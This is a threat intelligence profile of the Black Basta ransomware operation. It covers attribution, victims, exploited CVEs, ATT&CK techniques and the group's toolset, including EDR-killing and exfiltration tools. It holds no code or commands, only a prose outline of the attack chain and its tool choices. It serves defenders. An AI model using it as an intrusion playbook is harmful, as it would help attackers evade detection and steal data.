Threat Actor Profile: Black Basta

Overview and Attribution

Black Basta is a prolific ransomware operation first observed in April 2022, with development activity traced back to at least early February 2022. The group is classified as a cybercriminal actor, operating for financial gain through a ransomware-as-a-service (RaaS) model. While the group's country of origin and region remain officially unconfirmed, the speed at which they amassed victims and the sophistication of their negotiation tactics strongly suggest that Black Basta is not a new operation but rather a rebrand of a previous top-tier ransomware gang that brought along its experienced affiliates. This assessment is supported by their rapid operational maturity and the use of advanced, well-established tools and techniques. The group maintains a data leak site (DLS) and a negotiation chat portal on the Tor network, indicating a structured extortion operation.

Victimology and Impact

Black Basta has demonstrated a broad and aggressive targeting strategy, with over 523 victims recorded on their public leak site as of early 2025. The group's victimology is global, with a focus on English-speaking and European organizations. Their targeting is indiscriminate in terms of sector, but they have shown a particular emphasis on critical infrastructure, manufacturing, healthcare, and technology companies. The group's ability to quickly compromise and encrypt large networks, combined with their willingness to negotiate, has made them a critical threat. The group has been observed exploiting several high-profile vulnerabilities for initial access and privilege escalation, including CVE-2024-1709 (ConnectWise ScreenConnect, CVSS 10.0), CVE-2024-37085 (VMware ESXi, "ESX Admins"), CVE-2024-26169 (Windows Error Reporting Service), CVE-2022-30190 ("Follina"), CVE-2021-42278/42287 ("NoPac"), CVE-2021-1675/34527 ("PrintNightmare"), and CVE-2020-1472 ("ZeroLogon"). This demonstrates a proactive approach to incorporating newly disclosed vulnerabilities into their attack chain.

Tactics, Techniques, and Procedures (TTPs)

Black Basta employs a multi-stage attack chain that leverages a combination of commodity malware, custom tools, and living-off-the-land (LOLBAS) techniques to achieve their objectives.

Initial Access (TA0001): The primary vector for initial access is spear-phishing with malicious attachments (T1566.001). Victims receive emails containing password-protected ZIP archives that house malicious documents (.doc, .pdf, .xls). These documents are designed to deliver the initial payload, often Qakbot, which serves as a loader for subsequent stages.

Execution (TA0002): Once initial access is achieved, Black Basta operators execute payloads using several methods. They utilize Windows Management Instrumentation (WMI) (T1047) via a custom tool called "Invoke-TotalExec" to push the ransomware binary across the network. They also employ System Services via PsExec (T1569.002) to execute payloads on remote hosts. Additionally, they use encoded PowerShell scripts (T1059.001) to download and execute additional malicious scripts, providing a flexible and stealthy execution environment.

Persistence (TA0003): To maintain a foothold in the compromised environment, Black Basta creates new user accounts (T1136), often with names like "temp," "r," or "admin." They then manipulate these accounts by adding them to the local Administrators group (T1098) to ensure elevated access. The group also establishes persistence by creating benign-looking Windows services (T1543.003) for the ransomware binary and leverages DLL search order hijacking (T1574.001) through Qakbot to execute malicious payloads.

Privilege Escalation (TA0004): Black Basta employs several techniques to escalate privileges once inside the network. They modify Group Policy Objects (GPOs) (T1484.001) to achieve both privilege escalation and defense evasion. They also reuse the DLL search order hijacking technique (T1574.001) and the creation of Windows services (T1543.003) to gain higher-level permissions.

Toolset and Capabilities

Black Basta's toolset is extensive and indicative of a highly organized and well-resourced operation. For discovery and enumeration, they use AdFind, BloodHound, PowerView, PSNmap, and SoftPerfect NetScan to map the Active Directory environment and identify high-value targets. For credential theft, they rely on Mimikatz. Their arsenal includes several offensive security tools such as Brute Ratel C4, Cobalt Strike, Metasploit, and PowerSploit for command and control and lateral movement. For defense evasion, they use "Backstab," a tool that leverages the Process Explorer driver to terminate endpoint detection and response (EDR) processes. Data exfiltration is performed using RClone and Qaz[.]im. The group also leverages a wide array of remote monitoring and management (RMM) tools, including AnyDesk, Atera, NetSupport, ScreenConnect, Splashtop, and Supremo, for persistent remote access. Finally, they utilize LOLBAS tools like BITSAdmin, PsExec, and Quick Assist to blend in with legitimate administrative activity. This comprehensive toolset, combined with their exploitation of critical vulnerabilities, makes Black Basta a highly capable and dangerous ransomware group.